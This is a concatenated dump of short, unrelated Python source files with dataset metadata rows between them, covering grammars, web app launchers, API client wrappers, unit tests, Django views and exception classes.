from context_free_grammar import Context_Free_Grammar def Grammar(): grammar = Context_Free_Grammar() grammar.add_terminal('+', '*', '(', ')', 'id') grammar.add_non_terminal('E', 'T', 'F') grammar.set_start_symbol('E') grammar.add_production_rule('E', ['E', '+', 'T'], ['T']) grammar.add_production_rule('T', ['T', '*', 'F'], ['F']) grammar.add_production_rule('F', ['(', 'E', ')'], ['id']) return grammar
23.611111
58
0.614118
55
425
4.436364
0.345455
0.204918
0.221311
0.295082
0
0
0
0
0
0
0
0
0.127059
425
17
59
25
0.657682
0
0
0
0
0
0.061321
0
0
0
0
0
0
1
0.1
false
0
0.1
0
0.3
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
9658362fa7fbb40495ffba85d37c4d7bab283af2
64
py
Python
scripts/download/download.py
GalAster/Twossoms
5011c07d4662c3b81d433fc8b6d076b0b17ed0d8
[ "CC0-1.0" ]
1
2019-03-01T00:48:05.000Z
2019-03-01T00:48:05.000Z
scripts/download/download.py
GalAster/Twossoms
5011c07d4662c3b81d433fc8b6d076b0b17ed0d8
[ "CC0-1.0" ]
null
null
null
scripts/download/download.py
GalAster/Twossoms
5011c07d4662c3b81d433fc8b6d076b0b17ed0d8
[ "CC0-1.0" ]
null
null
null
latest = "https://github.com/GalAster/Twossoms/releases/latest"
32
63
0.78125
8
64
6.25
0.875
0
0
0
0
0
0
0
0
0
0
0
0.046875
64
1
64
64
0.819672
0
0
0
0
0
0.8125
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
965ddeadff84d31e57ad97652f59a52dfdc38abf
507
py
Python
app.py
rcmachado/cookiecutter-search
d7c9ebd931f6b93c3d0d3b05d2478be797404d7a
[ "MIT" ]
null
null
null
app.py
rcmachado/cookiecutter-search
d7c9ebd931f6b93c3d0d3b05d2478be797404d7a
[ "MIT" ]
null
null
null
app.py
rcmachado/cookiecutter-search
d7c9ebd931f6b93c3d0d3b05d2478be797404d7a
[ "MIT" ]
null
null
null
# coding: utf-8 from tornado.ioloop import IOLoop from cookiecutter_search import config from cookiecutter_search.application import MainApplication from cookiecutter_search.urls import urlpatterns if __name__ == '__main__': app_config = { 'debug': config.DEBUG, 'static_path': 'cookiecutter_search/static/', 'template_path': 'cookiecutter_search/templates/' } app = MainApplication(urlpatterns, **app_config) app.listen(config.PORT) IOLoop.instance().start()
28.166667
59
0.731755
55
507
6.436364
0.490909
0.254237
0.186441
0
0
0
0
0
0
0
0
0.002375
0.169625
507
17
60
29.823529
0.83848
0.025641
0
0
0
0
0.191057
0.115854
0
0
0
0
0
1
0
false
0
0.307692
0
0.307692
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
9676e04f5a6786894f0d159d0af1bd9c0483d35a
457
py
Python
pyro/contrib/gp/models/__init__.py
cweniger/pyro
ba104f07ca17865d2600e8765d920d549fcb3fbc
[ "MIT" ]
10
2020-03-18T14:41:25.000Z
2021-07-04T08:49:57.000Z
pyro/contrib/gp/models/__init__.py
cweniger/pyro
ba104f07ca17865d2600e8765d920d549fcb3fbc
[ "MIT" ]
19
2018-10-30T13:45:31.000Z
2019-09-27T14:16:57.000Z
pyro/contrib/gp/models/__init__.py
cweniger/pyro
ba104f07ca17865d2600e8765d920d549fcb3fbc
[ "MIT" ]
5
2020-06-21T23:40:35.000Z
2021-11-09T16:18:42.000Z
from pyro.contrib.gp.models.gplvm import GPLVM from pyro.contrib.gp.models.gpr import GPRegression from pyro.contrib.gp.models.model import GPModel from pyro.contrib.gp.models.sgpr import SparseGPRegression from pyro.contrib.gp.models.vgp import VariationalGP from pyro.contrib.gp.models.vsgp import VariationalSparseGP __all__ = [ "GPLVM", "GPModel", "GPRegression", "SparseGPRegression", "VariationalGP", "VariationalSparseGP", ]
28.5625
59
0.772429
55
457
6.345455
0.327273
0.137536
0.25788
0.292264
0.395415
0
0
0
0
0
0
0
0.129103
457
15
60
30.466667
0.876884
0
0
0
0
0
0.161926
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.428571
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
9676e31827673fb81102a3d1c887cab0cd874307
1,028
py
Python
Section_5/Exercise_06.py
Szymon-Budziak/WDI_exercises_solutions
51ffc9ec8b3cd6809bd55e98ecb8aed759c2d460
[ "MIT" ]
null
null
null
Section_5/Exercise_06.py
Szymon-Budziak/WDI_exercises_solutions
51ffc9ec8b3cd6809bd55e98ecb8aed759c2d460
[ "MIT" ]
null
null
null
Section_5/Exercise_06.py
Szymon-Budziak/WDI_exercises_solutions
51ffc9ec8b3cd6809bd55e98ecb8aed759c2d460
[ "MIT" ]
1
2021-11-21T09:38:33.000Z
2021-11-21T09:38:33.000Z
""" Liczby zespolone są reprezentowane przez krotkę (re, im). Gdzie: re - część rzeczywista liczby, im - część urojona liczby. Proszę napisać podstawowe operacje na liczbach zespolonych, m.in. dodawanie, odejmowanie, mnożenie, dzielenie, potęgowanie, wypisywanie i wczytywanie. """ from math import sqrt, cos, sin def addition(a, b): return (a[0] + b[0], a[1] + b[1]) def subtraction(a, b): return (a[0] - b[0], a[1] - b[1]) def multiplication(a, b): return (a[0] * b[0] - a[1] * b[1], a[0] * b[1] + a[1] * b[0]) def division(a, b): return ((a[0] * b[0] + a[1] * b[1]) / (b[0] ** 2 + b[1] ** 2), (a[1] * b[0] - a[0] * b[1]) / (b[0] ** 2 + b[1] ** 2)) def power(a, n): z = sqrt(a[0] ** 2 + a[1] ** 2) cosx = a[0] / z angel = sin(cosx) return ((z ** n) * cos(n * angel), (z ** n) * sin(n * angel)) # enter complex number by typing x+yj e.g. 4+6j def complex_number_input(): re, im = tuple(map(int, input().split("+i"))) return re, im print(complex_number_input())
25.7
95
0.560311
180
1,028
3.177778
0.377778
0.027972
0.031469
0.062937
0.146853
0.146853
0.146853
0.146853
0.122378
0.122378
0
0.049242
0.229572
1,028
39
96
26.358974
0.67298
0.311284
0
0
0
0
0.002857
0
0
0
0
0
0
1
0.315789
false
0
0.052632
0.210526
0.684211
0.052632
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
9692b34f2b5cf59a715c085a492483a181531406
1,018
py
Python
tests/test_articles.py
koyoo-maxwel/highlights
9f551c64f7d1be440117d3f843f0f0671caf03f4
[ "MIT" ]
null
null
null
tests/test_articles.py
koyoo-maxwel/highlights
9f551c64f7d1be440117d3f843f0f0671caf03f4
[ "MIT" ]
null
null
null
tests/test_articles.py
koyoo-maxwel/highlights
9f551c64f7d1be440117d3f843f0f0671caf03f4
[ "MIT" ]
null
null
null
import unittest from app.models import Articles class TestArticles(unittest.TestCase): ''' Test class to test the behavior of the articles class ''' def setUp(self): ''' Test class to run before other tests ''' self.new_article = Articles('koyoo','sales is advanced','the marketing industry is realy transforming verry fast', 'https://google.com','https://google.com/images','2015-01-10T36:20:07Z') def test_instance(self): self.assertTrue(isinstance(self.new_article,Articles)) def test_to_check_instance_variables(self): self.assertEquals(self.new_article.author,'koyoo') self.assertEquals(self.new_article.title,'sales is advanced') self.assertEquals(self.new_article.description,'the marketing industry is realy transforming verry fast') self.assertEquals(self.new_article.url,'https://google.com') self.assertEquals(self.new_article.urlToImage,'https://google.com/images')
40.72
122
0.68664
126
1,018
5.452381
0.420635
0.071325
0.142649
0.167394
0.358079
0.139738
0.139738
0.139738
0
0
0
0.017178
0.199411
1,018
25
123
40.72
0.825767
0.088409
0
0
0
0
0.292135
0
0
0
0
0
0.428571
1
0.214286
false
0
0.142857
0
0.428571
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
1
0
0
0
0
0
0
0
3
96a09075f26029c812a08fc6172cd3271eeb2071
1,073
py
Python
tests/v1/test_logs_status_remapper.py
MichaelTROEHLER/datadog-api-client-python
12c46626622fb1277bb1e172753b342c671348bd
[ "Apache-2.0" ]
null
null
null
tests/v1/test_logs_status_remapper.py
MichaelTROEHLER/datadog-api-client-python
12c46626622fb1277bb1e172753b342c671348bd
[ "Apache-2.0" ]
null
null
null
tests/v1/test_logs_status_remapper.py
MichaelTROEHLER/datadog-api-client-python
12c46626622fb1277bb1e172753b342c671348bd
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License. # This product includes software developed at Datadog (https://www.datadoghq.com/). # Copyright 2019-Present Datadog, Inc. from __future__ import absolute_import import sys import unittest import datadog_api_client.v1 try: from datadog_api_client.v1.model import logs_status_remapper_type except ImportError: logs_status_remapper_type = sys.modules[ 'datadog_api_client.v1.model.logs_status_remapper_type'] from datadog_api_client.v1.model.logs_status_remapper import LogsStatusRemapper class TestLogsStatusRemapper(unittest.TestCase): """LogsStatusRemapper unit test stubs""" def setUp(self): pass def tearDown(self): pass def testLogsStatusRemapper(self): """Test LogsStatusRemapper""" # FIXME: construct object with mandatory attributes with example values # model = LogsStatusRemapper() # noqa: E501 pass if __name__ == '__main__': unittest.main()
27.512821
108
0.746505
130
1,073
5.915385
0.592308
0.052016
0.083225
0.093628
0.146944
0.146944
0.106632
0.106632
0
0
0
0.015909
0.17987
1,073
38
109
28.236842
0.857955
0.383038
0
0.157895
0
0
0.094574
0.082171
0
0
0
0.026316
0
1
0.157895
false
0.157895
0.368421
0
0.578947
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
1
1
0
0
0
0
3
96b2b6c8dc9b4ec999de72b5e023045243717609
218
py
Python
custom_components/carson/const.py
rado0x54/ha-carson-living
b3be3f9608b60e4023829f7f055719f1c13cbcd8
[ "MIT" ]
1
2020-11-23T19:36:27.000Z
2020-11-23T19:36:27.000Z
custom_components/carson/const.py
rado0x54/ha-carson-living
b3be3f9608b60e4023829f7f055719f1c13cbcd8
[ "MIT" ]
2
2020-11-23T21:33:16.000Z
2020-11-23T22:54:28.000Z
custom_components/carson/const.py
rado0x54/ha-carson-living
b3be3f9608b60e4023829f7f055719f1c13cbcd8
[ "MIT" ]
null
null
null
"""Constants for the Carson integration.""" DOMAIN = "carson" UNLOCKED_TIMESPAN_SEC = 5 ATTRIBUTION = "provided by Eagle Eye" CONF_LIST_FROM_EAGLE_EYE = "list_from_eagle_eye" DEFAULT_CONF_LIST_FROM_EAGLE_EYE = False
24.222222
48
0.802752
32
218
5.03125
0.625
0.198758
0.242236
0.298137
0.248447
0
0
0
0
0
0
0.005181
0.114679
218
8
49
27.25
0.829016
0.169725
0
0
0
0
0.262857
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
7365f7ff5b9a151f031af210ef1f64784f2994fe
534
py
Python
vk_channelify/vk_errors.py
reo7sp/vk-channelify
06e513d8aef456bc91b927102d542fb444cf8502
[ "MIT" ]
21
2017-05-01T11:25:59.000Z
2022-03-01T20:10:15.000Z
vk_channelify/vk_errors.py
reo7sp/vk-channelify
06e513d8aef456bc91b927102d542fb444cf8502
[ "MIT" ]
6
2017-05-06T01:55:30.000Z
2018-06-27T20:00:26.000Z
vk_channelify/vk_errors.py
reo7sp/vk-channelify
06e513d8aef456bc91b927102d542fb444cf8502
[ "MIT" ]
3
2017-05-30T12:13:41.000Z
2018-03-17T18:18:46.000Z
class VkError(Exception):
    """Error reported by the VK API.

    Attributes:
        code: numeric error code returned by VK.
        message: error description returned by VK.
        request_params: parameters of the request that triggered the error.
    """

    def __init__(self, code, message, request_params):
        super(VkError, self).__init__()
        self.code = code
        self.message = message
        self.request_params = request_params

    def __str__(self):
        return 'VkError {}: {} (request_params: {})'.format(self.code, self.message, self.request_params)


class VkWallAccessDeniedError(VkError):
    """Raised when VK denies access to a wall.

    The previous ``__init__`` was a byte-for-byte duplicate of the parent's
    and has been removed; the inherited constructor behaves identically.
    """
35.6
105
0.694757
58
534
5.931034
0.258621
0.264535
0.104651
0.209302
0.232558
0.232558
0.232558
0.232558
0
0
0
0
0.191011
534
14
106
38.142857
0.796296
0
0
0.181818
0
0
0.065543
0
0
0
0
0
0
1
0.272727
false
0
0
0.090909
0.545455
0
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
737c2561ba89ca6632acd0136d14057de7d2cc6c
3,665
py
Python
pygrocydm/grocy_datamanager.py
fossabot/pygrocydm
6da0c1eda19c6059941440465ac815cead2760b3
[ "MIT" ]
null
null
null
pygrocydm/grocy_datamanager.py
fossabot/pygrocydm
6da0c1eda19c6059941440465ac815cead2760b3
[ "MIT" ]
null
null
null
pygrocydm/grocy_datamanager.py
fossabot/pygrocydm
6da0c1eda19c6059941440465ac815cead2760b3
[ "MIT" ]
null
null
null
from .battery import BATTERIES_ENDPOINT, Battery
from .chore import CHORES_ENDPOINT, Chore
from .equipment import EQUIPMENT_ENDPOINT, Equipment
from .grocy_api_client import (DEFAULT_PORT_NUMBER, GrocyApiClient,
                               GrocyEntityList)
from .location import LOCATION_ENDPOINT, Location
from .product import PRODUCTS_ENDPOINT, Product
from .product_group import PRODUCT_GROUPS_ENDPOINT, ProductGroup
from .quantity_unit import QUANTITY_UNITS_ENDPOINT, QuantityUnit
from .quantity_unit_conversion import (QUANTITY_UNIT_CONVERTIONS_ENDPOINT,
                                       QuantityUnitConversion)
from .shopping_list import (SHOPPING_LIST_ENDPOINT, SHOPPING_LISTS_ENDPOINT,
                            ShoppingList, ShoppingListItem)
from .task import TASKS_ENDPOINT, Task
from .task_category import TASK_CATEGORIES_ENDPOINT, TaskCategory
from .userentity import USERENTITIES_ENDPOINT, UserEntity
from .userfield import USERFIELDS_ENDPOINT, Userfield
from .userobject import USEROBJECTS_ENDPOINT, UserObject


class GrocyDataManager():
    """
    Main class, Handles Generic Entities from Grocy
    """

    def __init__(
            self,
            base_url,
            api_key,
            port: int = DEFAULT_PORT_NUMBER,
            verify_ssl=True):
        """
        Constructor requiring base url and API key
        :param base_url: Grocy server url
        :param api_key: Grocy API key
        """
        self.__api = GrocyApiClient(base_url, api_key, port, verify_ssl)

    def __entity_list(self, cls, endpoint) -> GrocyEntityList:
        # Shared factory: every accessor below previously repeated this
        # two-line body verbatim; centralising it removes 15x duplication.
        return GrocyEntityList(self.__api, cls, endpoint)

    def products(self) -> GrocyEntityList:
        return self.__entity_list(Product, PRODUCTS_ENDPOINT)

    def chores(self) -> GrocyEntityList:
        return self.__entity_list(Chore, CHORES_ENDPOINT)

    def locations(self) -> GrocyEntityList:
        return self.__entity_list(Location, LOCATION_ENDPOINT)

    def batteries(self) -> GrocyEntityList:
        return self.__entity_list(Battery, BATTERIES_ENDPOINT)

    def shopping_list(self) -> GrocyEntityList:
        return self.__entity_list(ShoppingListItem, SHOPPING_LIST_ENDPOINT)

    def shopping_lists(self) -> GrocyEntityList:
        return self.__entity_list(ShoppingList, SHOPPING_LISTS_ENDPOINT)

    def quantity_unit_conversions(self) -> GrocyEntityList:
        return self.__entity_list(
            QuantityUnitConversion, QUANTITY_UNIT_CONVERTIONS_ENDPOINT)

    def quantity_units(self) -> GrocyEntityList:
        return self.__entity_list(QuantityUnit, QUANTITY_UNITS_ENDPOINT)

    def tasks(self) -> GrocyEntityList:
        return self.__entity_list(Task, TASKS_ENDPOINT)

    def task_categories(self) -> GrocyEntityList:
        return self.__entity_list(TaskCategory, TASK_CATEGORIES_ENDPOINT)

    def product_groups(self) -> GrocyEntityList:
        return self.__entity_list(ProductGroup, PRODUCT_GROUPS_ENDPOINT)

    def equipment(self) -> GrocyEntityList:
        return self.__entity_list(Equipment, EQUIPMENT_ENDPOINT)

    def userfields(self) -> GrocyEntityList:
        return self.__entity_list(Userfield, USERFIELDS_ENDPOINT)

    def userentities(self) -> GrocyEntityList:
        return self.__entity_list(UserEntity, USERENTITIES_ENDPOINT)

    def userobjects(self) -> GrocyEntityList:
        return self.__entity_list(UserObject, USEROBJECTS_ENDPOINT)
37.783505
76
0.708868
372
3,665
6.696237
0.188172
0.044962
0.132477
0.168607
0.213167
0.062625
0
0
0
0
0
0
0.225375
3,665
96
77
38.177083
0.877422
0.042292
0
0
0
0
0
0
0
0
0
0
0
1
0.228571
false
0
0.214286
0
0.671429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
3
7388a2b391edec8068c5c3fd3a45519283bf30d5
837
py
Python
user-test.py
Barrack-coder/Password-locker
a4edde929971537d5126e3140766f843676abf43
[ "MIT" ]
null
null
null
user-test.py
Barrack-coder/Password-locker
a4edde929971537d5126e3140766f843676abf43
[ "MIT" ]
null
null
null
user-test.py
Barrack-coder/Password-locker
a4edde929971537d5126e3140766f843676abf43
[ "MIT" ]
null
null
null
# import unittest # from user import user # from user import credentials # class TestClass(unittest.TestCase): # def setUp(self): # self.new_user= user("Barry", "Barry@1234") # def test_init(self): # self.assertEqual =(self.newName,"Barry") # self.assertEqual =(self.newName,"Barry@1234") # def test_save_user(self): # self.new_user.save_user() # self.assertEqual (len(user.user_list),1) # class TestClass(unittest.TestCase): # def setUp(self): # self.assertEqual = (self.new_credentials.user,"Barry") # self.assertEqual = (self.new_credentials.account,"email") # self.assertEqual = (self.new_credentials.password,"Barry@1234")
36.391304
81
0.557945
85
837
5.376471
0.294118
0.196937
0.207877
0.14442
0.544858
0.201313
0.201313
0.201313
0
0
0
0.022807
0.318996
837
23
82
36.391304
0.778947
0.899642
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
739754ff58ed0aa91372fae8a1ffa65d260feec8
2,254
py
Python
tensorflow_federated/python/core/backends/xla/execution_contexts.py
zhihansh/federated-oss
38cfcb05702ff7297db76d3ccb5f5afef53ca09b
[ "Apache-2.0" ]
1,918
2019-02-22T21:17:28.000Z
2022-03-30T14:49:53.000Z
tensorflow_federated/python/core/backends/xla/execution_contexts.py
zhihansh/federated-oss
38cfcb05702ff7297db76d3ccb5f5afef53ca09b
[ "Apache-2.0" ]
999
2019-02-22T21:47:44.000Z
2022-03-31T11:06:42.000Z
tensorflow_federated/python/core/backends/xla/execution_contexts.py
zhihansh/federated-oss
38cfcb05702ff7297db76d3ccb5f5afef53ca09b
[ "Apache-2.0" ]
498
2019-02-22T21:17:56.000Z
2022-03-29T02:54:15.000Z
# Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Execution contexts for the XLA backend."""

from tensorflow_federated.python.core.backends.xla import compiler
from tensorflow_federated.python.core.backends.xla import executor
from tensorflow_federated.python.core.impl.context_stack import context_stack_impl
from tensorflow_federated.python.core.impl.execution_contexts import sync_execution_context
from tensorflow_federated.python.core.impl.executors import executor_stacks


def create_local_python_execution_context():
  """Creates an XLA-based local execution context.

  NOTE: This context is only directly backed by an XLA executor. It does not
  support any intrinsics, lambda expressions, etc.

  Returns:
    An instance of `execution_context.ExecutionContext` backed by XLA executor.
  """
  # TODO(b/175888145): Extend this into a complete local executor stack.
  factory = executor_stacks.local_executor_factory(
      support_sequence_ops=True,
      leaf_executor_fn=executor.XlaExecutor,
      local_computation_factory=compiler.XlaComputationFactory())
  return sync_execution_context.ExecutionContext(executor_fn=factory)


def set_local_python_execution_context(*args, **kwargs):
  """Sets an XLA-based local execution context.

  Invokes `create_local_execution_context` to construct an execution context,
  and sets it as the default. Accepts the same parameters as
  `create_local_execution_context`.

  Args:
    *args: Positional args for `create_local_execution_context`.
    **kwargs: Keyword args for `create_local_execution_context`.
  """
  context = create_local_python_execution_context(*args, **kwargs)
  context_stack_impl.context_stack.set_default_context(context)
41.740741
91
0.797693
307
2,254
5.680782
0.416938
0.119266
0.072248
0.083142
0.260321
0.237959
0.057339
0.057339
0
0
0
0.008705
0.13354
2,254
53
92
42.528302
0.884281
0.570541
0
0
0
0
0
0
0
0
0
0.018868
0
1
0.142857
false
0
0.357143
0
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
1
0
1
0
0
3
73a1d4768f532c0e3d7d03bc69cb0e17b25c07bb
1,939
py
Python
LINEZX/Api/shop.py
HelloTan/linezx
40f4c15b8cfb8de52aa837db5831dac4947adb9a
[ "MIT" ]
2
2018-07-20T12:55:45.000Z
2018-08-15T14:55:45.000Z
LINEZX/Api/shop.py
HelloTan/linezx
40f4c15b8cfb8de52aa837db5831dac4947adb9a
[ "MIT" ]
null
null
null
LINEZX/Api/shop.py
HelloTan/linezx
40f4c15b8cfb8de52aa837db5831dac4947adb9a
[ "MIT" ]
1
2018-07-07T10:06:01.000Z
2018-07-07T10:06:01.000Z
# -*- coding: utf-8 -*-
from thrift.transport import THttpClient
from thrift.protocol import TCompactProtocol
from .config import Config
from akad import ShopService
from akad.ttypes import *


class Shop(Config):
    """Thrift HTTP client wrapper around the LINE ShopService API."""

    client = None

    def __init__(self, authToken):
        """Open an authenticated transport and build the ShopService client.

        :param authToken: token sent as the ``X-Line-Access`` header.
        """
        Config.__init__(self)
        self.transport = THttpClient.THttpClient(self.LINE_HOST_DOMAIN, None, self.LINE_API_QUERY_PATH_FIR)
        self.transport.path = self.LINE_AUTH_QUERY_PATH
        self.transport.setCustomHeaders({
            "X-Line-Application": self.APP_NAME,
            "User-Agent": self.USER_AGENT,
            "X-Line-Access": authToken
        })
        # Dropped a stray trailing semicolon from the original line below.
        self.protocol = TCompactProtocol.TCompactProtocol(self.transport)
        self.client = ShopService.Client(self.protocol)
        self.transport.path = self.LINE_SHOP_QUERY_PATH
        self.transport.open()

    def getProduct(self, packageID, language='ID', country='ID'):
        return self.client.getProduct(packageID, language, country)

    def getActivePurchases(self, start, size, language='ID', country='ID'):
        # NOTE(review): despite its name, this delegates to
        # getNewlyReleasedPackages rather than an "active purchases" RPC —
        # confirm whether that is intentional.
        return self.client.getNewlyReleasedPackages(start, size, language, country)

    def getDownloads(self, start=0, size=1000, language='ID', country='ID'):
        return self.client.getDownloads(start, size, language, country)

    def getCoinProducts(self, appStoreCode, country="ID", language="ID"):
        return self.client.getCoinProducts(appStoreCode, country, language)

    def getEventPackages(self, start, size, language='ID', country='ID'):
        return self.client.getEventPackages(start, size, language, country)

    def getPopularPackages(self, start, size, language='ID', country='ID'):
        return self.client.getPopularPackages(start, size, language, country)

    def notifyDownloaded(self, packageId, language='ID'):
        return self.client.notifyDownloaded(packageId, language)
43.088889
108
0.689531
213
1,939
6.173709
0.267606
0.060837
0.063878
0.095817
0.322433
0.162738
0.162738
0.109506
0.109506
0.109506
0
0.003868
0.200103
1,939
44
109
44.068182
0.843972
0.01083
0
0
0
0
0.035791
0
0
0
0
0
0
1
0.235294
false
0
0.147059
0.205882
0.647059
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
73a7fc1f2e13b1dc725aebbab60c24130260a362
2,090
py
Python
lingcod/studyregion/views.py
google-code-export/marinemap
b7d58db11720637845b6a83bf70435c32c5af531
[ "BSD-3-Clause" ]
3
2017-06-09T20:44:58.000Z
2017-12-26T12:09:21.000Z
lingcod/studyregion/views.py
underbluewaters/marinemap
c001e16615caa2178c65ca0684e1b6fd56d3f93d
[ "BSD-3-Clause" ]
null
null
null
lingcod/studyregion/views.py
underbluewaters/marinemap
c001e16615caa2178c65ca0684e1b6fd56d3f93d
[ "BSD-3-Clause" ]
3
2016-11-30T13:41:56.000Z
2019-05-07T17:07:12.000Z
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest, HttpResponseServerError, HttpResponseForbidden
from django.template import RequestContext
from django.shortcuts import get_object_or_404, render_to_response
from lingcod.common import default_mimetypes as mimetypes
from lingcod.common.utils import KmlWrap
from django.core.urlresolvers import reverse
from django.conf import settings
from lingcod.studyregion import models
from django.views.decorators.cache import cache_page


def _kml_response(content):
    """Wrap *content* with KmlWrap and serve it with the KML mimetype."""
    return HttpResponse(KmlWrap(content), content_type=mimetypes.KML)


def studyregion(request, template_name='studyregion/studyregion.html'):
    """Render the main application window."""
    context = RequestContext(request, {'api_key': settings.GOOGLE_API_KEY})
    return render_to_response(template_name, context)


def show(request, pk):
    """Display a map with the study region geometry."""
    context = RequestContext(request, {'api_key': settings.GOOGLE_API_KEY,
                                       'pk': pk})
    return render_to_response('studyregion/show.html', context)


def kml(request, pk):
    """Return kml for the requested StudyRegion."""
    region = get_object_or_404(models.StudyRegion, pk=pk)
    return _kml_response(region.kml(request.get_host()))


@cache_page(60 * 60 * 24)
def regionKml(request):
    """Handler for AJAX regionKml request."""
    region = models.StudyRegion.objects.current()
    return _kml_response(region.kml(request.get_host()))


def regionKmlChunk(request, n, s, e, w):
    """Serve one bounding-box chunk of the current study region as KML."""
    region = models.StudyRegion.objects.current()
    chunk = region.kml_chunk(float(n), float(s), float(e), float(w))
    return _kml_response('<Document>' + chunk + '</Document>')


def regionLookAtKml(request):
    """Handler for AJAX regionLookAtKml request."""
    region = models.StudyRegion.objects.current()
    return _kml_response('<Document>' + region.lookAtKml() + '</Document>')
39.433962
137
0.711005
239
2,090
6.09205
0.338912
0.041209
0.068681
0.063187
0.384615
0.337912
0.337912
0.337912
0.273352
0.273352
0
0.007013
0.18134
2,090
52
138
40.192308
0.843951
0.117703
0
0.185185
0
0
0.060934
0.027904
0
0
0
0
0
1
0.222222
false
0
0.333333
0
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
73a9ec1decac7bc2900d6ef88325ceefa8ff5617
539
py
Python
lib/exceptions.py
yiayiao/taobao_auto_buy
389efe48acad6a3b16ae2a107bb417489f12f624
[ "Apache-2.0" ]
75
2020-01-08T22:51:44.000Z
2021-08-22T22:38:16.000Z
lib/exceptions.py
yiayiao/taobao_auto_buy
389efe48acad6a3b16ae2a107bb417489f12f624
[ "Apache-2.0" ]
10
2020-02-04T10:48:52.000Z
2021-06-22T03:33:32.000Z
lib/exceptions.py
yiayiao/taobao_auto_buy
389efe48acad6a3b16ae2a107bb417489f12f624
[ "Apache-2.0" ]
30
2020-02-19T13:48:35.000Z
2021-07-15T22:59:16.000Z
class SystemUnsupported(Exception):
    """Raised with a fixed Chinese message about an unsupported system."""

    def __init__(self):
        super().__init__("不支持您的系统")


class SubClassInvaild(Exception):
    """Raised when a subclass does not implement a required function."""

    def __init__(self):
        super().__init__("SubClass didn't provide needed function")


class InvalidInputUrl(Exception):
    """Raised with a fixed Chinese message about an invalid product URL."""

    def __init__(self):
        super().__init__("商品链接无效, 请检查后重试")


class InvalidInputTime(Exception):
    """Raised with a fixed Chinese message about an invalid purchase time."""

    def __init__(self):
        super().__init__("抢购时间无效, 请按照格式重新输入")
22.458333
59
0.658627
51
539
6.333333
0.431373
0.148607
0.198142
0.247678
0.334365
0
0
0
0
0
0
0
0.231911
539
23
60
23.434783
0.780193
0
0
0.5
0
0
0.142857
0
0
0
0
0
0
1
0.25
false
0
0
0
0.5
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
73c19314d6e4d13b386c12724384759236a9077d
2,243
py
Python
lemon/protocol/Image/CdnImageFetchResp.py
lemon-chat/lemon-server-python
5947b52b3c4535ae54fe2705a830db07fdaf741d
[ "MIT" ]
null
null
null
lemon/protocol/Image/CdnImageFetchResp.py
lemon-chat/lemon-server-python
5947b52b3c4535ae54fe2705a830db07fdaf741d
[ "MIT" ]
null
null
null
lemon/protocol/Image/CdnImageFetchResp.py
lemon-chat/lemon-server-python
5947b52b3c4535ae54fe2705a830db07fdaf741d
[ "MIT" ]
null
null
null
